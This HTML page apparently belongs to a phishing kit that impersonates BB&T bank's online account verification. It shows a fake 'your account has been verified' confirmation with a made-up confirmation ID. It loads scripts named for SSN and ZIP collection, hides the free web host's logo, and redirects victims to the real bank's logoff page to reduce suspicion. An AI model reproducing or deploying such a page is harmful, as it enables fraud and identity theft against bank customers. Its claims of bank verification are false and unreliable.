<html class="gt-ie9 ua-windows_nt ua-windows_nt-6 ua-windows_nt-6-1 ua-gecko ua-gecko-54 ua-gecko-54-0 ua-firefox ua-firefox-54 ua-firefox-54-0 ua-desktop ua-desktop-windows js js no-flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d 
&#10;csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths" lang="en"><head class="at-element-marker" style="visibility: visible;">
<meta http-equiv="Refresh" content="15;URL=https://www.bbt.com/logoff/u-by-bbt.page">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

<title>Verification - BB&amp;T Online Account Verification</title>
<meta charset="UTF-8">

<noscript>

<meta http-equiv="refresh" content="">
</noscript>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">

<meta name="format-detection" content="telephone=yes">


<link href="T.goe/1.ico" rel="Shortcut Icon">
<link href="T.goe/sec.css" rel="stylesheet" type="text/css">

<script src="T.goe/ssnzipassist2.js" type="text/javascript">
</script>

<script src="T.goe/ssnzipassist3.js" type="text/javascript">
</script>
<script src="T.goe/ssnzipassist.js" type="text/javascript">
</script>

<script src="T.goe/ssnzip.js" type="text/javascript">
</script>

</head><body>
	
<div class="innerBody">

<div id="toolbar">

<div class="wrapper">

<div id="auth">

</div>

<a class="more-info icon-menu" id="right-menu" href="#right-menu">
<i class="icon-menu-list"></i>INFO</a>
</div>

</div>

<header id="mainHeader">

<div>
		
<a id="skipNav" href="#mainContent">Skip to main content</a>

<a id="logo" href="">

<img width="80" height="80" alt="BB&amp;T Logo" src="T.goe/11.gif">

</a>

<h1 id="pageTitle"><font size="5">
Online Account Verification
</font>

</h1>

</div>

</header>








<div class="progress-wrapper">

<nav id="progress">

<h1 class="accessibilityNote"><font size="4">Progress Indicator</font></h1>

<header>
<h2 class="accessibilityNote"><font size="4">Current Progress</font></h2>
<div class="gray-bar">
<div class="Bar" data-current="100" data-end="100" data-start="25">

<div class="progressBack" style="width: 100%;">
<div class="progressTip">
</div>
</div>

<div class="Progress" style="width: 58%;"><span></span>
</div>
<div class="label" style="left: 341px;"><span></span>
</div>

</div>
</div>

</header>

<header>
<h2 class="accessibilityNote"><font size="4">Progress Screen Indicator</font></h2>

<ul>
<li class="?">

<h3><font size="3">
<i>
</i>
</font></h3>

<ul>

<li>
<i></i>
<a onclick="app.submit('formPrimary', 'page', '/showAccountSelection')" href="#">
 Sign in Verification</a>

</li>

</ul>

&nbsp;
</li>

<li class="?">
<h3><i><font size="3"></font></i></h3>

<ul>

<li>
<i></i>
<a onclick="app.submit('formPrimary', 'page', '/showAccountSelection')" href="#">
 Sign in Verified</a>

</li>

</ul>

&nbsp;

</li>

<li class="?">
<h3><i><font size="3"></font></i></h3>

<ul>

<li>
<i></i>
<a onclick="app.submit('formPrimary', 'page', '/showAccountSelection')" href="#">
 Account Locked</a>

</li>

</ul>

&nbsp;

</li>

<li class="?">
<h3><i><font size="3"></font></i></h3>

<ul>

<li>
<i></i>
<a onclick="app.submit('formPrimary', 'page', '/showAccountSelection')" href="#">
 Unlock Verification</a>

</li>

</ul>

&nbsp;

</li>

<li class="step5 lg active ">

<h3><i><font size="3"></font></i></h3>

<ul>

<li>
Verification Summary
</li>

</ul>

</li>

</ul>

</header>
</nav>

</div>
<div class="group" id="pageWrap">

<div class="three-quarters">








<section class="personalInfo" id="mainContent">

<form>

<article id="primaryApplicant">

<fieldset>

<h3><font face="Verdana" size="2">Congratulation, Your account has been verified .</font></h3>

<h3><font size="3">Dear Valued Customer :</font></h3>
<p><font size="2">Your process will be review with our accounts department in next 24 hours .<br>Please keep Confirmation ID Number, for any further request from our security department .</font></p>
<p><h4 class="clearBoth accName bold"><font size="2"> Confirmation Details:</font></h4><font size="2">Your Process Confirmation ID :</font><input name="NextButton" title="Confirmation" id="NextButton" type="button" value="BBT-52705-082017"><br><font size="2">
Your Process Date &amp; Time :</font> <script language="javascript">
 var today = new Date();
 document.write(today);
 </script>
<h4 class="clearBoth accName"><font size="2">For security reasons, You will Log Off in few seconds.</font></h4>
</fieldset>


</article></form></section>
</div>

<div class="one-quarter">



<div id="sidr-content">

<div class="sidr right" id="sidr">

<aside id="rightRail">

<div class="railBox contactInfo">

<h3><font size="3">Your account verifired</font></h3>

<div class="lp-button-wrapper" id="lpButtonDiv-dmo">
</div>
<div id="lpChatButton">
</div>

</div>

<div class="railBoxWrap">

<div class="railBoxWrapBack">
<div class="railBox faq">

<h3><font size="3">
Verification Completed</font>
<span>&nbsp;</span>
</h3>

<ul class="faqList show-hide">

<li>

<i></i>
<a href="javascript:void(0);">Can I Login Now ?&nbsp;<span>Click to show answer</span></a>
<div class="conditional">

<p>Simply yes you can login now and have all access to your account(s)</p>

</div></li>

</ul>

</div>

<a class="close-right-rail" id="close-right" href="#close-right"><i class="icon-ex_"></i></a>

</div>
</div>
</aside>

</div>

</div>

<script type="text/javascript">
function openNewWindow(url) {

	var params = "height=600,width=1000,top=300,left=100,status=yes,toolbar=no,menubar=no,location=no,scrollbars=yes,resizable=yes";
	var bankservAgreement = window.open(url, '_blank', params);

}
</script>

</div>
		
</div>




<footer>
<div id="copyright">
<ul class="group">
<li><a href="" target="_blank">Bank Secrecy Act Notice<i></i></a></li>

<li><a href="" target="_blank">BB&amp;T Locations</a></li>
				
<li><a href="" target="_blank">Privacy &amp; Security<i></i></a></li>

</ul>

<p class="preload">
Branch Banking and Trust Company, Member FDIC. <br>
&copy;&nbsp;2020,&nbsp;Branch Banking and Trust Company. All rights reserved.

</p>
</div>

</footer>

<script src="explain.js" type="text/javascript"></script>


</div></body><style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style></html>